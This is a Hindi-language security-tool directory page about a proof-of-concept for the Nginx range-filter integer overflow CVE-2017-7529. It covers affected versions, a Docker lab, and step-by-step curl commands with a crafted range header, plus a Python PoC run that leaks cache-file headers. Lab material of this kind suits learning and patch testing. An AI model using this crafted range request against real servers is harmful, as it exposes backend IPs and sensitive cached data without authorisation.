Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/liusec/cve-2017-7529
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubliusec/cve-2017-7529

CVE-2017-7529

Nginx पूर्णांक अतिप्रवाह (CVE-2017-7529) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो निर्मित रेंज अनुरोधों के माध्यम से कैश हेडर प्रकटीकरण को सक्षम करता है, जिसमें डॉकर-आधारित प्रयोगशाला वातावरण और पायथन POC स्क्रिप्ट शामिल है।

रिपॉजिटरी देखें
1689 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Nginx पूर्णांक अतिप्रवाह भेद्यता CVE-2017-7529

भेद्यता जानकारी

जब Nginx मानक मॉड्यूल का उपयोग करता है, तो हमलावर दुर्भावनापूर्ण रूप से निर्मित range फ़ील्ड वाले हेडर अनुरोध भेजकर प्रतिक्रिया में कैश फ़ाइल के हेडर जानकारी प्राप्त कर सकता है। कुछ कॉन्फ़िगरेशन में, कैश फ़ाइल हेडर में बैकएंड सर्वर का IP पता या अन्य संवेदनशील जानकारी हो सकती है, जिससे जानकारी लीक हो सकती है।

संदर्भ:【भेद्यता विश्लेषण】Nginx range फ़िल्टर पूर्णांक अतिप्रवाह भेद्यता (CVE–2017–7529) चेतावनी विश्लेषण

भेद्यता प्रभाव

यह भेद्यता Nginx के सभी संस्करणों 0.5.6 - 1.13.2 को प्रभावित करती है जिनमें डिफ़ॉल्ट कॉन्फ़िगरेशन मॉड्यूल सक्षम है। केवल कैशिंग सक्षम होने पर हमलावर दूरस्थ हमला करने और जानकारी लीक करने के लिए दुर्भावनापूर्ण अनुरोध भेज सकता है।

जब Nginx सर्वर प्रॉक्सी कैश का उपयोग कर रहा हो, तो हमलावर इस भेद्यता का उपयोग करके सर्वर का बैकएंड वास्तविक IP या अन्य संवेदनशील जानकारी प्राप्त कर सकता है।

हमारे विश्लेषण के अनुसार, इस भेद्यता का शोषण करना आसान है और इसे low-hanging-fruit भेद्यता के रूप में वर्गीकृत किया जा सकता है, वास्तविक नेटवर्क हमलों में भी इसका कुछ उपयोग मूल्य है।

प्रभावित संस्करण

Nginx version 0.5.6 - 1.13.2

सुधार संस्करण

Nginx version 1.13.3, 1.12.1

वातावरण प्राप्त करना:

  1. इमेज को स्थानीय रूप से खींचें
root@kitploit:~
$ docker pull medicean/vulapps:n_nginx_1
  1. वातावरण शुरू करें
root@kitploit:~
$ docker run -d -p 8000:80 medicean/vulapps:n_nginx_1

-p 8000:80 में आगे वाला 8000 भौतिक मशीन के पोर्ट को दर्शाता है, इसे आप अपनी इच्छानुसार निर्दिष्ट कर सकते हैं।

उपयोग और शोषण

POC

  1. कैश फ़ाइल तक पहुँचकर Content-Length प्राप्त करें, उदाहरण के लिए /proxy/demo.png:
root@kitploit:~
$ curl -I http://127.0.0.1:8000/proxy/demo.png

HTTP/1.1 200 OK
Server: nginx/1.13.1
Date: Wed, 12 Jul 2017 15:57:57 GMT
Content-Type: image/png
Content-Length: 16585
Connection: keep-alive
Last-Modified: Wed, 12 Jul 2017 15:57:57 GMT
ETag: W/"40c9-5543e4fad0d40"
X-Proxy-Cache:: MISS
Accept-Ranges: bytes

Content-Length: 16585 देखें, इससे बड़ा मान चुनें, जैसे 17208, दूसरा range मान 0x8000000000000000-17208 होगा, अर्थात 9223372036854758600

  1. अनुरोध करते समय range इस प्रकार सेट करें:
root@kitploit:~
$ curl -i http://127.0.0.1:8000/proxy/demo.png -r -17208,-9223372036854758600

परिणाम देखें:

PoC स्क्रिप्ट

root@kitploit:~
$ python poc.py http://127.0.0.1:8000/proxy/demo.png

Vulnerable: http://127.0.0.1:8000/proxy/demo.png

संदर्भ लिंक

  • 【भेद्यता विश्लेषण】Nginx range फ़िल्टर पूर्णांक अतिप्रवाह भेद्यता (CVE–2017–7529) चेतावनी विश्लेषण
  • CVE-2017-7529 Nginx पूर्णांक अतिप्रवाह भेद्यता विश्लेषण
टूल डाउनलोड करें